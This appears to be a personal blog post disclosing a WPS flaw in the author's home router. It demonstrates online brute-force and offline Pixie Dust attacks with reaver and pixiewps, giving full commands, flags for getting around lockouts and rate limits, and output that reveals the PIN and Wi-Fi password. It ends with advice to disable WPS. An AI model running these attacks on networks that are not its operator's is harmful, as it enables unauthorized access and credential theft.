My worst nightmare on discovering a Wi-Fi WPS vulnerability on my home router
TL;DR Disable WPS on your router or access point today! Otherwise, an attacker could gain a foothold into your network and plan for further attacks.
In my own research, I was surprised that my home router was vulnerable to WPS offline brute force attack. What that means was that an attacker within a reasonable distance (approximately up to ~50m if you a strong wireless capable device was in used), was able to extract out my WiFi’s WPA2/PSK of greater than 12 in length (with reasonable complexity) in just mere seconds!
I have disclosed the vulnerability to my Telco service provider, who is working with the vendor to issue a patch for all users using the issued device.
What is WPS?
In 2006, Wi-Fi Alliance introduced WPS which was originally known as Wi-Fi Simple Config. WPS is a wireless network security standard that establish connections between a router and wireless devices faster and easier. Instead of the traditional way of selecting the network name (also named SSID) and keying the password (also called WPA-PSK key), WPS can be triggered by just a number of button press on the physical device. It works well for electronic devices (e.g. printers, TVs, smart home products etc.) with no or limited user interface.
WPS in application
Even if you have not used WPS before, I am sure most of you would have come across it, and yet not knowing what it was for back then. For explanation reasons, let’s assume there are two wireless devices, a.k.a clients, (i.e. printer and a android phone) that wish to join the network using WPS. The first step is to trigger the WPS feature on the wireless device.
Secondly, the user have to go to the router or Access Point (AP) to trigger the WPS feature. Once pressed, this technology will perform its magic.
The devices should then be connected after a seconds later. If the wireless device has some form of user interface, you should be able to take note of the successful connection to the network.
In the printer’s case, a successful connection will likely be indicated by the flashing of LED or some other form of indicators.
What we have discussed is the Push Button Configuration (PBC) method. An alternative is to provide the 8 digit pin where it is known as the Personal identification Number (PIN) method. In addition, these modes can be triggered either by the client or by the AP and vice versa.
How is WPS bad?
As mentioned earlier, WPS was created with convenience in mind, that means that there is a huge trade off between security and convenience. In a nutshell, an attacker who manage to obtain the WPS Pin to an AP can authenticate to your network and even extract your seemingly complex WiFi password.
There are three types of attacks against WPS enabled APs. The first of which is an online brute force attack while the second is an offline attack on the WPS pin. An attacker can perform these two attacks from up to approximately 50 meters depending on their wireless network device capability. The last attack requires the user to be physically next to the AP. For example, the attacker could press the WPS button on the AP (as shared in the previous section) and at times, the WPS pin could be printed on the AP itself. Assuming there is a malicious insider, this could be an easy entry to the corporate network. Even though these attacks have been shared over the internet over the past decade, WPS enabled devices are still everywhere (enabled by default)!
Before we dive into the specifics of the first two attacks, lets head into how the WPS pin is structured.
WPS Pin Structure
Every WPS pin consist of a 8 digit long number. The last digit of the pin is a checksum. However, these 8 digit pin isnt exactly used in totality when validating the PIN against the AP. The process requires the client to first prove possession of the first four digits. If the first four digits are accurate, the AP will then require the client to furnish the remaining 4 digits.
From an attackers perspective, this basically means that a brute force attempt is actually feasible, with a total of 11000 possibilities (10⁴ — first four digits plus 10³ — three digits in the second half since the last digit is a checksum which can be calculated).
Online brute force attack
Before going into the nitty gritty details, a proper WPS transaction has a series of exchange that happens between a client and an AP.
*for simplicity reasons, I have termed it as client and AP rather than the industry terms (registrar and enrollee)
In summary, these series of exchanges is also known as a “cryptodance”. Each side proves to the other that it knows the PIN without giving it away first.
To conduct this online brute force attack, we can use the reaver tool. Do note that a lot of blogs out there are using reaver’s older version and the flags/parameters used may not apply in the latest version of reaver. I’ve spent many hours trying to figure out the appropriate flags and also how to interpret if the tool is working well based on the verbose output messages. I will be sharing them in detail. For the conduct of my demonstration, I am using a kali-linux VM along with a Wi-Fi USBAdapter (Alfa).
Place the wireless adapter to monitoring mode:
root@kali:~# airmon-ng start wlan0Identify nearby devices that have WPS:
root@kali:~# wash –i wlan0monBSSID Ch dBm WPS Lck Vendor ESSID
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —58:6D:8F:09:95:77 11 -30 2.0 No Broadcom TestAP
*a simple search around my home vicinity revealed more than 30 APs allowing WPS.
Start performing the online brute force against the BSSID you are targeting:
root@kali:~# reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 -N -L –c 11Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 58:6D:8F:09:95:77
[+] Switching wlan0mon to channel 11
[+] Received beacon from 58:6D:8F:09:95:77
[+] Vendor: Broadcom
[+] Trying pin “11115670”
[+] Sending authentication request
[+] Sending association request
[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK//If the client is unable to furnish the first four digit of the pin, the AP will not send the M5 message. The brute force continues with a different pin.[+] 15.62% complete @ 2020–06–25 03:16:33 (33 seconds/pin)
[+] Trying pin “63968767”
[+] Sending authentication request
[+] Sending association request
[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
< truncated for brevity reasons>
[+] Received M1 message
[+] Sending M2 message
< truncated for brevity reasons>
[+] Received M3 message
[+] Sending M4 message
< truncated for brevity reasons>
[+] Received M5 message
[+] Sending M6 message
< truncated for brevity reasons>
[+] Received M7 message
[+] Sending WSC NACK
[+] Pin cracked in 51 seconds
[+] WPS PIN: ‘63968767’
[+] WPA PSK: ‘testing1’
[+] AP SSID: ‘TestAP’
*Note: Do not be alarmed if you observe a lot of repeated packets coming from the AP. I have snipped them out for brevity reasons.
reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 –N -L –c 11- vv -> Display non-critical warnings (-vv or -vvv for more)
- d -> Set the delay between pin attempts. There may be to modify this value or the timeout (-t) to circumvent possible rate-limiting on the device
- N -> Do not send NACK messages when out of order packets are received. I noticed that if this option is not set, I am unable to perform any successful brute force
- -L -> Ignore locked state reported by the target AP
- -c -> Set the 802.11 channel for the interface (implies -f)
Based on the output of the tool, it takes approximately 33 seconds to test out a pin. Thus, with 11000 possibilities, that may take up to 4 days to gain access to the network. Still, a pretty feasible wait to gain a foothold to the network. I usually start the brute force from 6000 onward (modify the codes in keys.c) and then subsequently downwards from 6000. May be just me, but I tend to notice that the majority (80%) of WPS pins starts from a higher range number (6000 0000–9999 9999). With sufficient time, an online brute force attack will work and eventually reveal the PSK to an attacker.
Offline brute force attack
A Swiss researcher by the name of Dominique Bongard found a flaw in many APs implementation of the M3 message highlighted in Figure 6. In it, the AP encrypts the actual PIN, uses a strong algorithm (AES) with secret keys consisting of two randomly-chosen numbers, and sends you the result. As mentioned, the process is a ‘cryptodance’ and the AP has committed to its proof that it knows the PIN, but in a way that you can’t verify until later.
Referencing a good analogy shared in Sophos blog “it’s a bit like a sealed-bid auction, where the router’s bid is locked in before yours, but in a way that you can’t see it in order to determine your bid. But what the Swiss researcher found is that many routers didn’t seal their bids very well, using “random” numbers that you could guess, or in some cases calculate for yourself. In other words, at step M3, you could simply fail the protocol, and go ahead cracking the encryption on the M3 data packet. That would reveal the PIN directly, no guessing required.”
All in all, it is possible to brute force for the WPS PIN by capturing an attempted (and even failed) exchange attempt. This allows an attacker to obtain the WPS PIN in mere seconds, and eventually obtain the Wi-Fi PSK key, gaining access to the Wi-Fi network.
However, this attack goes back to early 2010s and most of the vendors have already patched this issue. Just recently when I embarked on this research journey, I recall telling my colleagues that WPS offline cracking attacks have long been fixed, and reading up forums, security testers have never seen an AP vulnerable to this issue before.
Ironically when I returned home to test on my home networks, I was surprised that the tool ‘pixiedust’ instantly returned my WPA2-PSK in mere seconds. Whats more is that I had used a password stronger than 12 characters and with reasonable complexity. The nightmare was that the AP does not allow me to disable WPS. I immediately searched the internet for an updated firmware but there wasn’t any.
*Till date, I have informed the Telco on the vulnerability and they are working with the vendor to issue a patch in the coming months.
Most of the WPS attack tools have all been integrated into the Reaver tool. This test is pretty quick, if it works it works, if it doesn’t, that just means your product is not vulnerable to offline brute force attacks. To conduct this attack, simply run the following commands:
root@kali:/tmp# reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 –K// -K will trigger the pixiedust attack. All it requires is just a single failed attempt to attempt to crack the Pin.Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from <BSSID>
[+] Received beacon from <BSSID>
[+] Trying pin “12345670”
[+] Sending authentication request
[+] Sending association request
[+] Associated with <BSSID> (ESSID: <redacted>)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
executing pixiewps -e <redacted> -s <redacted> -z <redacted> -a <redacted> -n <redacted> -r <redacted>
Pixiewps 1.4
[?] Mode: 3 (RTL819x)
[*] Seed N1: <redacted>
[*] Seed ES1: <redacted>
[*] Seed ES2: <redacted>
[*] PSK1: <redacted 16 byte hex>
[*] PSK2: <redacted 16 byte hex>
[*] ES1: <redacted 16 byte hex>
[*] ES2: <redacted 16 byte hex>
[+] WPS pin: <redacted>
[*] Time taken: 0 s 70 ms
[+] Pixiewps: success: setting pin to <redacted>
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Updated P1 array
[+] Updated P2 array
[+] Quitting after pixiewps attack
[+] Pin cracked in 15 seconds
[+] WPS PIN: <redacted>
[+] WPA PSK: <redacted>
[+] AP SSID: <redacted>
As seen from the output, the PIN was cracked in 15 seconds. This is way faster than the online brute forcing technique which could take up to an approximate of four days.
What should you do to prevent yourself from being a target?
Personally, I felt that Wi-Fi settings, configurations and security have often been overlooked. We have seen the good and the bad of WPS and yet, it is enabled by default in most APs today. I will like to share a couple of recommendations to prevent WPS attacks:
- Disable WPS if it is not in used … Disable WPS if it is not in used … Disable WPS if it is not in used! I can’t stress this enough. You can do so by heading to your AP web interface (if you have not changed your web portal login credentials, this will be a good time to do so!) and locate the WPS feature. By disabling it, you are cutting off all connections via WPS. This applies to both the push button mode or the pin mode (as demonstrated in the attacks). If you really need to use WPS to pair devices with no or limited user interface, just remember to turn on and off this feature after the successful pairing.
- Evaluate your home routers by performing simple test on them. There are instances even when you turn off your WPS, it could still be mysteriously accepting WPS in the background. You can watch for such behaviour by listening on the air (wash –i wlan0mon). If you are a frequent user of WPS, you may want to ensure that the AP is not vulnerable to offline brute force attack.
- Remove any printed WPS pin on your physical device. With the disclosed pin, an attacker could specify it by using the –p flag in Reaver. A malicious insider will then be able to gain access to your network PSK within a single try via the online brute force attack.
